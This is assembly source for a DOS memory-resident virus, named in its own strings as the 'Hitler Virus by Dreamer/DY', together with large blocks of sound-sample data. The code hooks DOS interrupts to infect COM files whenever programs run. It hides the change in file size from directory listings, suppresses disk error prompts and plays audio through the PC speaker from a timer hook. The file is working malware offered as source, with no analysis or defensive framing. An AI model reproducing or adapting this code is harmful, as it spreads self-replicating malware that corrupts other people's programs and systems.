db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt:
size equ $-100h
pgf equ ($+16)/16

@@ -0,0 +1,701 @@
call rakett
old db !­'
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh
int 21h
jnc failed
cli
mov ax,3521h
int 21h
mov w [bp+offset old21],bx
mov w [bp+offset old21+2],es
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380
sti
call normalspeed
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21
int 21h
mov al,1Ch
mov dx,offset ni1C
int 21h
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret
findFCB: popf
call int21
pushf
or al,al
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax
push bx
push dx
push es
mov ah,2Fh
call int21
cmp byte es:[bx],0FFh
jne normFCB
add bx,8
normFCB: mov al,byte es:[bx+16h]
and al,31
xor al,31
jnz shitFCB
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size
sbb dx,0
jc shitFCB
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB:
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h
je findFCB
cmp ah,12h
je findFCB
cmp ax,42ABh
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h
jne not_4B00
call install_24
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h
call int21
jc back1
mov cs:old_attr,cx
test cl,4
jnz back1
mov ax,4301h
xor cx,cx
call int21
jc back1
push dx
push ds
call infect
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h
call int21
jnc okay_open
bad1: ret
okay_open: xchg bx,ax
mov ax,5700h
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh
mov cx,5
mov dx,offset old
push cs
pop ds
call int21
jc close
cmp al,5
jne close
cmp word old[0],'MZ'
je close
cmp word old[0],'ZM'
je close
cmp old[0],0E9h
jne infect1
cmp word old[3],'­!'
jne infect1
close: pop dx
pop cx
mov ax,5701h
call int21
mov ah,3Eh
call int21
ret
infect1: mov ax,4202h
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000
jae close
dec ax
dec ax
dec ax
mov word ptr putjmp[1],ax
mov ah,40h
mov cx,size
mov dx,100h
call int21
jc close
cmp ax,size
jne close
mov ax,4200h
xor cx,cx
xor dx,dx
call int21
mov ah,40h
mov cx,5
mov dx,offset putjmp
call int21
or byte ss:[bp],31
jmp close
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf
cli
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
cmp teller,0
je teller_ok
dec teller
jmp noreset
teller_ok:
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample
jb noreset
mov xofs,offset sample
noreset:
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
